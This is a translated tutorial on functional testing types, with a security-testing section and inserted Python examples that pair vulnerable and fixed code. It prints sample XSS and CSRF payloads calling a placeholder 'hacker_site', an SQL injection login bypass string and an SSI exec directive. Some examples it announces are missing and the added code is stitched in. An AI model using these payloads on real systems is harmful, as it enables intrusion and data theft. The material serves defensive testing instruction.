Today we will take a closer look at the functional types of testing and everything related to them.
All kinds of software testing, depending on the objectives pursued, can be conditionally divided into the following groups:
– Related to the changes.
In our next articles we will describe each individual type of testing, its purpose and its use in software testing in more detail.
Functional types of testing
Functional tests are based on the functions and features of the system, as well as its interaction with other systems, and can be carried out at all levels of testing: component (unit) testing, integration testing, system testing and acceptance testing. Functional types of testing consider the external behavior of the system. Let's list some of the most common types of functional tests:
- Functional testing
- Security and Access Control Testing
- Interoperability Testing
Functional testing considers the predefined behavior and is based on an analysis of the specification of the functionality of the component or the system as a whole.
Functional tests are based on the functions performed by the system and can be performed at all levels of testing (component, integration, system, acceptance). Typically these functions are described in requirements, functional specifications, or use cases of the system.
Functional testing can be carried out from two perspectives:
– requirements
– business processes
Testing from the requirements perspective uses the specification of functional requirements for the system as the basis for designing test cases. In this case it is necessary to make a list of what will and will not be tested, to prioritize the requirements based on risk (if this has not been done in the requirements document), and on this basis to prioritize the test cases. This allows you to focus and not miss testing the most important functionality.
Testing from the business-process perspective uses knowledge of the business processes themselves, which describe the scenarios of daily use of the system. In this perspective, test scenarios (test scripts) are, as a rule, based on use cases of the system.
Benefits of functional testing:
– simulates the actual use of the system;
Disadvantages of functional testing:
– the possibility of missing logical errors in the software;
– the likelihood of redundant testing.
Automation of functional testing is quite common.
Security and Access Control Testing
Security testing is a testing strategy used to check the security of the system and to analyze the risks associated with a holistic approach to application security: hacker attacks, viruses and unauthorized access to confidential data.
Principles of Software Security
The overall security strategy is based on three basic principles:
Confidentiality is the concealment of certain resources or information. Confidentiality can be understood as restricting access to a resource to a certain category of users, or in other words, defining under what conditions a user is authorized to access the resource.
Integrity is defined by two main criteria:
- Confidence. It is expected that the resource will be changed only in the appropriate way by a certain group of users.
- Damage and recovery. If the data is corrupted or incorrectly changed by an authorized or unauthorized user, you must determine how important the recovery procedure is.
Availability is the requirement that resources should be available to an authorized user, internal object, or device. Typically, the more critical a resource, the higher the level of availability should be.
Types of vulnerabilities
Currently, the most common types of software security vulnerabilities are:
- XSS (Cross-Site Scripting) is a kind of vulnerability of software (web applications) in which malicious scripts are injected into a server-generated page and executed in the client's browser in order to attack the client.
- XSRF / CSRF (Cross-Site Request Forgery) is a type of vulnerability that exploits shortcomings of the HTTP protocol. The attackers work according to the following scheme: a link to a malicious site is placed on a page the user trusts; when the user follows the link, a script is executed that captures personal data (passwords, payment details, etc.), sends spam messages on behalf of the user, or changes the access settings of the user's account to gain full control over it.
- Code injection (SQL, PHP, ASP, etc.) is a kind of vulnerability in which it becomes possible to run executable code in order to gain access to system resources, obtain unauthorized access to data, or disable the system.
- Server-Side Includes (SSI) Injection is a type of vulnerability in which server-side directives are inserted into HTML code, or executed directly on the server.
- Authorization Bypass is a type of vulnerability in which it is possible to gain unauthorized access to an account or documents of another user.
How to test software for security?
Here are some examples of testing software for security vulnerabilities. To do this, you need to check your software for the known types of vulnerabilities:
XSS (Cross-Site Scripting)
XSS attacks can be very diverse. Attackers can try to steal your cookies, redirect you to a site where a more serious attack will take place, load a malicious object into memory, and so on, simply by placing a malicious script on your site. As an example, consider the following script, which displays your cookies on the screen:
or a script that redirects to an infected page:
or the creation of a malicious object carrying a virus, etc.:
<object type="text/x-scriptlet" data="http://hacker_site"></object>
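To turn the object-tag example above into a repeatable security test, the following added code (not from the original article) renders a user-supplied value into a page twice, once without encoding and once with HTML encoding, and reports whether the article's payload comes back as live markup. The greeting template and hacker_site placeholder host are assumptions.

```python
import html

# The article's object-tag payload, with hacker_site kept as a placeholder host (constructed test input).
OBJECT_PAYLOAD = '<object type="text/x-scriptlet" data="http://hacker_site"></object>'


def render_greeting_vulnerable(display_name: str) -> str:
    # Concatenates a user-supplied value straight into the server-generated page.
    return "<p>Welcome, " + display_name + "!</p>"


def render_greeting_fixed(display_name: str) -> str:
    # HTML-encodes the value: < > & and quotes become entities and render as text, not markup.
    return "<p>Welcome, " + html.escape(display_name, quote=True) + "!</p>"


def xss_test_case(render, payload: str = OBJECT_PAYLOAD) -> bool:
    """Submits the payload through a renderer and reports whether it came back unencoded.
    True means the browser would parse the injected markup (defect found)."""
    return payload in render(payload)
```

The encoded form still displays the original characters to the user, so the fix loses no data; only the markup interpretation is removed.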
XSRF / CSRF (Request Forgery)
var foo = new Image();
foo.src = "http://hacker_site/?command";
Code injections (SQL, PHP, ASP, etc.)
For the insertion of executable code, consider an example with SQL.
The login form has two fields: name and password. Processing takes place in the database by executing the SQL query:
WHERE Name = 'tester'
AND Password = 'testpass';
Enter the correct name 'tester', and in the password field enter the line:
testpass' OR '1'='1
As a result, if the field has no appropriate validation or input handling, a vulnerability opens that allows entry into the password-protected system, since the SQL query takes the following form:
WHERE Name = 'tester'
AND Password = 'testpass' OR '1'='1';
The condition '1'='1' is always true, so the SQL query will always return rows.
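The login check above, rewritten as an added Python example (not the article's own code) against an in-memory SQLite database: the vulnerable version concatenates the two form fields into the query text exactly as described, the fixed version uses a parameterised query, and a test function feeds both the article's input and two variants where the password or the account is unknown. The table name "users" is an assumption; the page shows only the WHERE clause.

```python
import sqlite3

# Constructed in-memory database holding the article's single account (sample data, not
# from the original page); the table name "users" is an assumption.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (Name TEXT, Password TEXT)")
conn.execute("INSERT INTO users VALUES ('tester', 'testpass')")


def login_vulnerable(name: str, password: str) -> bool:
    # The query text is assembled by string concatenation, so a quote typed into the
    # password field ends the string literal and the rest becomes SQL syntax.
    sql = ("SELECT * FROM users WHERE Name = '" + name
           + "' AND Password = '" + password + "';")
    return conn.execute(sql).fetchone() is not None


def login_fixed(name: str, password: str) -> bool:
    # Parameterised query: values travel separately from the statement text, so the
    # string testpass' OR '1'='1 is compared literally with the stored password and fails.
    sql = "SELECT * FROM users WHERE Name = ? AND Password = ?"
    return conn.execute(sql, (name, password)).fetchone() is not None


def injection_test_case(login) -> dict:
    """Runs the article's input and two variants against a login function and reports
    which ones are accepted; True under any 'injected' key means the defect is present."""
    return {
        "valid_credentials": login("tester", "testpass"),
        "wrong_password": login("tester", "wrong"),
        # exact input from the article: correct name, crafted password field
        "injected_with_known_password": login("tester", "testpass' OR '1'='1"),
        # same trick when the password is not known at all
        "injected_unknown_password": login("tester", "x' OR '1'='1"),
        # neither name nor password known: AND binds tighter than OR, so the
        # trailing OR '1'='1' makes the whole WHERE clause true for every row
        "injected_unknown_user": login("nobody", "x' OR '1'='1"),
    }
```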
Server-Side Includes (SSI) Injection
Depending on the type of operating system the commands may differ; as an example, consider a directive that displays a list of files on Linux:
<!--#exec cmd="ls" -->
Authorization Bypass
User A can access the documents of user B. Assume there is an implementation where, when you view your profile containing confidential information, your userID is passed in the page URL. In this case it makes sense to try substituting another user's number for your userID, and if you see that user's data, you have found a defect.
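The userID-substitution check just described, as an added Python example that is not part of the original article: a profile handler that trusts the userID from the URL is placed beside one that compares it with the logged-in session user, and a test function performs the substitution and reports whether the other user's data was disclosed. The profile store, URL layout and Forbidden exception are assumptions.

```python
from urllib.parse import parse_qs, urlparse

# Constructed profile store: user id -> confidential profile data (sample data, not from the article).
PROFILES = {
    1: {"name": "user A", "card": "4111 **** **** 1111"},
    2: {"name": "user B", "card": "5500 **** **** 0004"},
}


class Forbidden(Exception):
    """Raised when the session user may not see the requested profile."""


def user_id_from_url(url: str) -> int:
    # Reads the userID query parameter, the value the article suggests substituting.
    return int(parse_qs(urlparse(url).query)["userID"][0])


def view_profile_vulnerable(session_user_id: int, url: str) -> dict:
    # Trusts the userID from the URL and never compares it with the logged-in user.
    return PROFILES[user_id_from_url(url)]


def view_profile_fixed(session_user_id: int, url: str) -> dict:
    # Object-level authorisation: the requested profile must belong to the session user.
    requested = user_id_from_url(url)
    if requested != session_user_id:
        raise Forbidden(f"user {session_user_id} may not view profile {requested}")
    return PROFILES[requested]


def authorization_bypass_test(view_profile, session_user_id: int, victim_user_id: int) -> bool:
    """The article's test: log in as one user, put another user's id into the URL.
    Returns True when the other user's data comes back (defect found), False when refused."""
    try:
        shown = view_profile(session_user_id, f"/profile?userID={victim_user_id}")
    except Forbidden:
        return False
    return shown == PROFILES[victim_user_id]
```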
There are many examples of vulnerabilities and attacks. Even after a full cycle of security testing you cannot be 100% sure that the system is really secure. But you can be sure that the share of unauthorized intrusions, information theft and data loss will be several times lower than for those who did not conduct security testing.
Interoperability Testing
With the development of network technologies and the Internet, the interaction of different systems, services and applications with each other has become highly relevant, since any problems with it can damage the company's reputation and, as a result, entail financial losses. Therefore, interoperability testing should be approached with all seriousness.
Interoperability Testing is a functional test that verifies the ability of an application to interact with one or more components or systems; it includes compatibility testing and integration testing.
Software with good interoperability characteristics can be easily integrated with other systems without requiring major modifications. The number of changes and the time required to make them can therefore be used as a measure of interoperability.
Stay tuned and continue to learn useful details about the software testing with us.